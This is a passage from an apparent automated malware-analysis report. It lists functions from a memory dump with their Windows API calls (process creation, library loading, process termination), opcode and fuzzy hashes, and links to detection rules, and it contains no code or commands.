Part of subcall function 003D7EE5: LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004), ref: 003D1458
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandleLibraryLoadProcessServiceTerminate
String ID:
API String ID: 3893904122-0
Opcode ID: ecd116aec675a75aecab111982de8d51413ea102026fc09be56d94c7679eef28
Instruction ID: c26bc63fa66f6e077f17d9dce9b847516099648d30541a6c7b49cc60b6722cad
Opcode Fuzzy Hash: ecd116aec675a75aecab111982de8d51413ea102026fc09be56d94c7679eef28
Instruction Fuzzy Hash: 69219933248741AAEF332AA4F9413AE266A5F43750F788207EC928D3C9CBBD8005C106

Uniqueness

Uniqueness Score: -1.00%

Function 003D1423, Relevance: 3.1, APIs: 2, Instructions: 82serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004), ref: 003D1458

Part of subcall function 003D7EE5: LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandleLibraryLoadProcessServiceTerminate
String ID:
API String ID: 3893904122-0
Opcode ID: 01af71cc734df984cb2624c9d76640fbfa5cfbad5e7e47aa843342e8470f5e47
Instruction ID: 7247ca9194bdc65cf997c968a4fd98cb73d2608db1859317ee01dca068ac3a44
Opcode Fuzzy Hash: 01af71cc734df984cb2624c9d76640fbfa5cfbad5e7e47aa843342e8470f5e47
Instruction Fuzzy Hash: F9217832548345AAEF236FA4F9817AE226A9F43750F38432BEC524E7C9CBB99505C506

Uniqueness

Uniqueness Score: -1.00%

Function 003D60C3, Relevance: 1.7, APIs: 1, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57bb1e9b43e1625640c7ffb39aa79a8635cf01424e373788db99f281700c9bd6
Instruction ID: da2a0a7b889f92596ee2fc5cd3fc5b993daa1a47cb0f0561e66b7aaeb6e0cbc2
Opcode Fuzzy Hash: 57bb1e9b43e1625640c7ffb39aa79a8635cf01424e373788db99f281700c9bd6
Instruction Fuzzy Hash: D451CC7B4582019ECB23AFB0F9827AD376D9F06794F20465BE8B18FB43D7208446CB12

Uniqueness

Uniqueness Score: -1.00%

Function 003D9F63, Relevance: 1.6, APIs: 1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bcab73b07c69d6359c4ee051dc6f074582498bd4145fd9ef65f446b7471857c
Instruction ID: 482c0da155ea21b93d35ad4ef457055118f924985a381f1bef6ea3a74a6dedb2
Opcode Fuzzy Hash: 4bcab73b07c69d6359c4ee051dc6f074582498bd4145fd9ef65f446b7471857c
Instruction Fuzzy Hash: C7410C33104F01CEDF175F65F7843A922ABAF16350F66825BC98286F94D7B988859743

Uniqueness

Uniqueness Score: -1.00%

Function 003D9FAF, Relevance: 1.6, APIs: 1, Instructions: 120processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,?,?,?,000000C0,?,?,-00000001,?,003D04F7,00000000), ref: 003DA426

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: f006b4346447b4a9f9f4de5d7057b332f252d1e925341c966e999f0878372238
Instruction ID: 08fb353f2e957811e9b089401c6c40e307468a006500774da7e5558dce282ecd
Opcode Fuzzy Hash: f006b4346447b4a9f9f4de5d7057b332f252d1e925341c966e999f0878372238
Instruction Fuzzy Hash: AC411933104F01CEDF175F65F7843A533AAAF12350F66825BC98286F94D7B989899743

Uniqueness

Uniqueness Score: -1.00%

Function 003D9FE8, Relevance: 1.6, APIs: 1, Instructions: 115processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,?,?,?,000000C0,?,?,-00000001,?,003D04F7,00000000), ref: 003DA426

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: e3c7d2334742dcc28d4c8505a3cf70f063fa554a990843a9b77450d6a13612d5
Instruction ID: e124a875c2283b238866b09be498ba9e0d7cea4198d8b507c013495f4fbd7981
Opcode Fuzzy Hash: e3c7d2334742dcc28d4c8505a3cf70f063fa554a990843a9b77450d6a13612d5
Instruction Fuzzy Hash: D5313D27104F01CDDF275F65F7483A5226B9F13350FAA8257CD828AF94D7B888899743

Uniqueness

Uniqueness Score: -1.00%

Function 003DA0A4, Relevance: 1.6, APIs: 1, Instructions: 114processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,?,?,?,000000C0,?,?,-00000001,?,003D04F7,00000000), ref: 003DA426

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 383be17dc4e00da8c767fd274718c08b4563b5f4d8f981fe76561281bb123654
Instruction ID: cb274e693acabe00ddacaaa6569b81f15b86ce67e6470b587364e232b8b87a90
Opcode Fuzzy Hash: 383be17dc4e00da8c767fd274718c08b4563b5f4d8f981fe76561281bb123654
Instruction Fuzzy Hash: BF310827544F11CDDB270FA6F3483A922AB9F17750FAA8247C88189ED4DBB985899703

Uniqueness

Uniqueness Score: -1.00%

Function 003DA020, Relevance: 1.6, APIs: 1, Instructions: 112processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,?,?,?,000000C0,?,?,-00000001,?,003D04F7,00000000), ref: 003DA426

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 19304075070d34c1c6325507815edd0d0caf6a858e2299e77830035d6c301ffd
Instruction ID: 8237a139b20bb2e8c98c5762dca838379f2855f9ca9db03becf66d26f3fbd75b
Opcode Fuzzy Hash: 19304075070d34c1c6325507815edd0d0caf6a858e2299e77830035d6c301ffd
Instruction Fuzzy Hash: 2131EA67104F01CDDF274F65F7483A522A6AF13350FAA8257C9828AF94D3B989899743

Uniqueness

Uniqueness Score: -1.00%

Function 003DA055, Relevance: 1.6, APIs: 1, Instructions: 109processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,?,?,?,000000C0,?,?,-00000001,?,003D04F7,00000000), ref: 003DA426

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 0c2fb2a448a783f3b896bdc7035b73b363979efac70baf965f5ae2162c53f7ad
Instruction ID: 41a7f7ddfea1f951f9f599f1db6de8d030dd157b34f6890d8680effb2fe40623
Opcode Fuzzy Hash: 0c2fb2a448a783f3b896bdc7035b73b363979efac70baf965f5ae2162c53f7ad
Instruction Fuzzy Hash: 2131EA27104F01CDDF274F65F7483A522A79F13350FAA825BCD828AF94D7B989899743

Uniqueness

Uniqueness Score: -1.00%

Function 003D212B, Relevance: 1.6, APIs: 1, Instructions: 102libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ae1ea54ff662c6d61a919fea459a63848e9b76aa42a0e1e9279d10e42be064d9
Instruction ID: 3a1acb2f1377da87ead32605015d6e3ffb29d6cc3fae177cddcc03fa28508d57
Opcode Fuzzy Hash: ae1ea54ff662c6d61a919fea459a63848e9b76aa42a0e1e9279d10e42be064d9
Instruction Fuzzy Hash: 86310667604105AAEF333B20FD43BFE166AAF62750FB18427BC6A9A781C72644859712

Uniqueness

Uniqueness Score: -1.00%

Function 003D9576, Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 784ffcbdedea56435a396d60cb938782c5d839ea3f85f8a27d033a2047ca7a63
Instruction ID: 01f14f6af89adbfed7da7d16d80b0b554d81988aafe22a35cc9e7637bb3aaec2
Opcode Fuzzy Hash: 784ffcbdedea56435a396d60cb938782c5d839ea3f85f8a27d033a2047ca7a63
Instruction Fuzzy Hash: 7D315E67904341DEDF335F24BD92B7867498B22330F618267E8B74D3C6D32484829713

Uniqueness

Uniqueness Score: -1.00%

Function 003D7ABD, Relevance: 1.6, APIs: 1, Instructions: 96libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 55dd1ba1c1c49a106578cd1b9ab8c121bd8335b981bb792972744e880bcc8710
Instruction ID: 29fba5b9d7aa2acd11fa136946e9bf37a3bd371460e3d9f879441bf3c4f12757
Opcode Fuzzy Hash: 55dd1ba1c1c49a106578cd1b9ab8c121bd8335b981bb792972744e880bcc8710
Instruction Fuzzy Hash: EB216A6721C146DECB332664F9A2BBE575E8F11310FB0452BF8E386B46F6204882A653

Uniqueness

Uniqueness Score: -1.00%

Function 003DA113, Relevance: 1.6, APIs: 1, Instructions: 94processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,?,?,?,000000C0,?,?,-00000001,?,003D04F7,00000000), ref: 003DA426

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 9b243a93881ace9e9b701d6fbd5af706fef27766e2eae5388d14b816bb574ade
Instruction ID: a4c90ea950c443d2d9a21daee35acc719421a0b9890881d27b8dbc3e69260e37
Opcode Fuzzy Hash: 9b243a93881ace9e9b701d6fbd5af706fef27766e2eae5388d14b816bb574ade
Instruction Fuzzy Hash: CD312B27504F01CDDB270F66F3483A522A7AF23350FAA8257C8C14AF94D7B88489D703

Uniqueness

Uniqueness Score: -1.00%

Function 003DA14B, Relevance: 1.6, APIs: 1, Instructions: 91processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,?,?,?,000000C0,?,?,-00000001,?,003D04F7,00000000), ref: 003DA426

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: cc0401d90e61ae411bfaba5365d9443e4a985b5dc819c89c9855405ac38dafb7
Instruction ID: 1ce6a95665c7b95b6dd8c63e3608273af880f4c88d5b48927d92580177cc474a
Opcode Fuzzy Hash: cc0401d90e61ae411bfaba5365d9443e4a985b5dc819c89c9855405ac38dafb7
Instruction Fuzzy Hash: 8421E927508F11CDDB274F66F3483A526A7AF13350FAA8257C8C146F94D7B98489D703

Uniqueness

Uniqueness Score: -1.00%

Function 003DA189, Relevance: 1.6, APIs: 1, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,?,?,?,000000C0,?,?,-00000001,?,003D04F7,00000000), ref: 003DA426

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: ffce745c06df41f5f52da852c6c2b9dfb6fca843eefd5b68de0ec0fe439ee8e0
Instruction ID: a0aa4074c681275c645153023989fc950d64b1ca966bfa013718b7ad6ea3086f
Opcode Fuzzy Hash: ffce745c06df41f5f52da852c6c2b9dfb6fca843eefd5b68de0ec0fe439ee8e0
Instruction Fuzzy Hash: F021F727504F01CDDB274F66F3883A522A7AF13350FAA8257D8C286F94D7B98888D703

Uniqueness

Uniqueness Score: -1.00%

Function 003D77F4, Relevance: 1.6, APIs: 1, Instructions: 85libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1608b601709ac4dedde5c7f912ffbce3732f9a2ed5efcff626f3cfcded353abd
Instruction ID: 1fe56feadd228b2766ba7ea03b02f3edc649e4a4027c633180e192776f5db3a6
Opcode Fuzzy Hash: 1608b601709ac4dedde5c7f912ffbce3732f9a2ed5efcff626f3cfcded353abd
Instruction Fuzzy Hash: 2621F36B61C20AEEDB337A64B9A27FE135D9B01710FB04527F8A346B41F3244985E643

Uniqueness

Uniqueness Score: -1.00%

Function 003DA1F4, Relevance: 1.6, APIs: 1, Instructions: 83processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,?,?,?,000000C0,?,?,-00000001,?,003D04F7,00000000), ref: 003DA426

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 47b6fe63ca1259f09273406f58aa9e63e23029639a4ca727725cd11666cc3e88
Instruction ID: 4b58b0eb8274a1972dadae448cc38d5f2c1db8ed4790bbb78fc352944869fc31
Opcode Fuzzy Hash: 47b6fe63ca1259f09273406f58aa9e63e23029639a4ca727725cd11666cc3e88
Instruction Fuzzy Hash: 3621C767548F018DDB274F62F34836526679F13350FAAC147C8818AF94D7B88489D703

Uniqueness

Uniqueness Score: -1.00%

Function 003DA1C3, Relevance: 1.6, APIs: 1, Instructions: 82processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,?,?,?,000000C0,?,?,-00000001,?,003D04F7,00000000), ref: 003DA426

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 240156bcf2f4012db8e770e5e82117299aaca4b7ec4ebda04b273824071045e6
Instruction ID: d9f29c39c666f4ecb5358c11ea8d4cd4258f8f1c0e367a04cbe0b941df141192
Opcode Fuzzy Hash: 240156bcf2f4012db8e770e5e82117299aaca4b7ec4ebda04b273824071045e6
Instruction Fuzzy Hash: 6721C427544F01CDDB275FA6F3883A53267AF23350FAA8257D88146E94D3B98889D743

Uniqueness

Uniqueness Score: -1.00%

Function 003DA234, Relevance: 1.6, APIs: 1, Instructions: 79processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,?,?,?,000000C0,?,?,-00000001,?,003D04F7,00000000), ref: 003DA426

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 4d0b73a04d7cfae53e914fb702c7d5666244b204924499d1bdfcfa5bae71f8d0
Instruction ID: fc7cca893672abb8d5a3d80aefd4415132294a1f4308e0006b62eaf61c0f5433
Opcode Fuzzy Hash: 4d0b73a04d7cfae53e914fb702c7d5666244b204924499d1bdfcfa5bae71f8d0
Instruction Fuzzy Hash: B7210427544F01CDDB271FA6F3883A933679F23350FAA8156C8818AF94D7B98889D703

Uniqueness

Uniqueness Score: -1.00%

Function 003DA27F, Relevance: 1.6, APIs: 1, Instructions: 77processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,?,?,?,000000C0,?,?,-00000001,?,003D04F7,00000000), ref: 003DA426

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 207dd93b402489385ac5bc734ac0cb566323ca53cd69fe47ab2ea393f286740d
Instruction ID: 6add7d82ccfd5bacba0604691d41c277878cd2ad9efd74e0390c2032907457e6
Opcode Fuzzy Hash: 207dd93b402489385ac5bc734ac0cb566323ca53cd69fe47ab2ea393f286740d
Instruction Fuzzy Hash: FE216A37108B428ED7075FA5F3893A23776AF13350F6E869BD8C14AA86D3B48548D303

Uniqueness

Uniqueness Score: -1.00%

Function 003D145F, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

Part of subcall function 003D7EE5: LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: 1379ad2853d7e8f4dadee2a1c4ef9943c3634b6d6771e97a2b006ae2052d8553
Instruction ID: 752911adaa91ee5671db1669b107308c43de1ea15136abb9e9a6a8ae74f17702
Opcode Fuzzy Hash: 1379ad2853d7e8f4dadee2a1c4ef9943c3634b6d6771e97a2b006ae2052d8553
Instruction Fuzzy Hash: 72219B33148341AAEF236F64F9417AE226A6F43750F388317EC525D3C9C7BD9005C205

Uniqueness

Uniqueness Score: -1.00%

Function 003D8EF8, Relevance: 1.6, APIs: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c29beeb74ff384f3399cefed9174812a880ee163b0fddf255878d66f6fbd2eb5
Instruction ID: 474964aa780e3d10884ed67df8abe482021a280b759f6c4e61ad2c018699bcee
Opcode Fuzzy Hash: c29beeb74ff384f3399cefed9174812a880ee163b0fddf255878d66f6fbd2eb5
Instruction Fuzzy Hash: FE110A9B648104EAEF333B60BD63BBD131E9B51364FB04927F473857D1CA1589849613

Uniqueness

Uniqueness Score: -1.00%

Function 003D14A7, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: c46d31cfb9b32c49f6d6781e108de97975baf61a0e7b00394c02fc11b6cb1d50
Instruction ID: 8f38b0e92f6052f0100f0a7a2cb20b5d72f0104d74a2bab1f219b6aa00382889
Opcode Fuzzy Hash: c46d31cfb9b32c49f6d6781e108de97975baf61a0e7b00394c02fc11b6cb1d50
Instruction Fuzzy Hash: DB116A33488742AEDF231BA8F54139D36996F03750F784357E8A68D2CACBB98045C606

Uniqueness

Uniqueness Score: -1.00%

Function 003D14E4, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 47939ba7f05826ef28b2ea62b9c535fa045029b2693aa0e4eb075760fff03f1c
Instruction ID: d0e0971259c6441fcdcd49ed990b2609febb4bdb5e374eb24ae2e293455176d0
Opcode Fuzzy Hash: 47939ba7f05826ef28b2ea62b9c535fa045029b2693aa0e4eb075760fff03f1c
Instruction Fuzzy Hash: 94112733048742AADF331FA4FA4539E26596F43750F794717ECA69D3C9CBB98105C506

Uniqueness

Uniqueness Score: -1.00%

Function 003DA363, Relevance: 1.6, APIs: 1, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,?,?,?,000000C0,?,?,-00000001,?,003D04F7,00000000), ref: 003DA426

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 1388d6bb8df6009b14902dccfcdf31392a9ea6c358f6c9aaad568868ff4892cc
Instruction ID: d7f03f20cd08e0f0d609fde21570da8431eef2d452911c40aa96ddb3f4496f93
Opcode Fuzzy Hash: 1388d6bb8df6009b14902dccfcdf31392a9ea6c358f6c9aaad568868ff4892cc
Instruction Fuzzy Hash: 6F112C27184F128CDB261FE6F34439D33AA9E13B80BDD47458CD1D9A8CEB79840AC306

Uniqueness

Uniqueness Score: -1.00%

Function 003D152D, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: d22ff544dca4ec0e996a24384f964cd27396cdec2c808e5b412020f63a09d355
Instruction ID: e3a7a196471e1f0fca5617ba9ccef062fedcd419c21126d0f7c20d2d97ad9bcd
Opcode Fuzzy Hash: d22ff544dca4ec0e996a24384f964cd27396cdec2c808e5b412020f63a09d355
Instruction Fuzzy Hash: B3118C33088B415EDF331FA8F64139D26996F03B40F788256E8919D2C9CBB9C115C206

Uniqueness

Uniqueness Score: -1.00%

Function 003D6D2B, Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3d55a0364012b49e441de7fd0433bdcf6692c9ea929059c3a6a837c1709e75bc
Instruction ID: fd9406971b45f82c61cba3f2e53cabf2ebc1a938a493b64f5a638bb55261fec4
Opcode Fuzzy Hash: 3d55a0364012b49e441de7fd0433bdcf6692c9ea929059c3a6a837c1709e75bc
Instruction Fuzzy Hash: DD01D65F594A11DDDF323FA4FA42BAD139C8B11B40FA08A27B8F5C8689DB2884469647

Uniqueness

Uniqueness Score: -1.00%

Function 003DA321, Relevance: 1.6, APIs: 1, Instructions: 58processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,?,?,?,000000C0,?,?,-00000001,?,003D04F7,00000000), ref: 003DA426

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 804a45d9b6911cf291f8cb1896146cb20a6e6961ebf06b23612fad4fbf4f295d
Instruction ID: d86f3895981d99f69d7bc89d5b01c1ab3674ea3426d52f4e56b14b8b1a6cebe6
Opcode Fuzzy Hash: 804a45d9b6911cf291f8cb1896146cb20a6e6961ebf06b23612fad4fbf4f295d
Instruction Fuzzy Hash: 86014917284F118CDB171EE6F3483E9236B8F17780FEA82529CC29AF88DB6945499203

Uniqueness

Uniqueness Score: -1.00%

Function 003D7DF9, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a72ddb881e034ff17cc7f79c6cba050c9751e69bcc9c14f387aad768cd54e9e4
Instruction ID: bd32e981fc64241969fd656ae27bb7d3db9883a8583bb8ceb3fda2520e388a35
Opcode Fuzzy Hash: a72ddb881e034ff17cc7f79c6cba050c9751e69bcc9c14f387aad768cd54e9e4
Instruction Fuzzy Hash: 3001FD8B51C115EADE333A60BE23BFE075D8B01354FB089A3F8B385B86D61588896643

Uniqueness

Uniqueness Score: -1.00%

Function 003D6D67, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 619b0429cfcd8843f90498596ab1092911f78dc1d067f5fe21c4bed644963b27
Instruction ID: 14310f87b8d25dc675d51fe4f24e6defec987688c1600d4de51d1981ed2ce6f0
Opcode Fuzzy Hash: 619b0429cfcd8843f90498596ab1092911f78dc1d067f5fe21c4bed644963b27
Instruction Fuzzy Hash: 9D01D65B598A109ECB223FA4F95376C239C4F12740F604A53B4F5C968ADB2890558646

Uniqueness

Uniqueness Score: -1.00%

Function 003D67F7, Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4fcf178025376f4e9cf84debabe0e37c78a4828a26719e606169552e800628a0
Instruction ID: 6a8f45f5c1e9385e99d66255454061f1a466c6eb270c3a03e619ff3bf6226bb9
Opcode Fuzzy Hash: 4fcf178025376f4e9cf84debabe0e37c78a4828a26719e606169552e800628a0
Instruction Fuzzy Hash: 6A01219F518014EADE333B20BE13BBD031D8B11750FB08833F8B395B82C6148989A643

Uniqueness

Uniqueness Score: -1.00%

Function 003D7A76, Relevance: 1.5, APIs: 1, Instructions: 49libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a0702f06222fa648c59be7f10ff58c64ce23982f6498e7374422aa00931f00ad
Instruction ID: 9b49b87bf78177cc1a4e56e7cdbefbc9af1b4d797b4b5843f9cf668f81a02cb3
Opcode Fuzzy Hash: a0702f06222fa648c59be7f10ff58c64ce23982f6498e7374422aa00931f00ad
Instruction Fuzzy Hash: F4F0D19B508415EADE333B60BD23BBE031D8B14750FB08923B8B385B82CA1589856653

Uniqueness

Uniqueness Score: -1.00%

Function 003D158B, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B

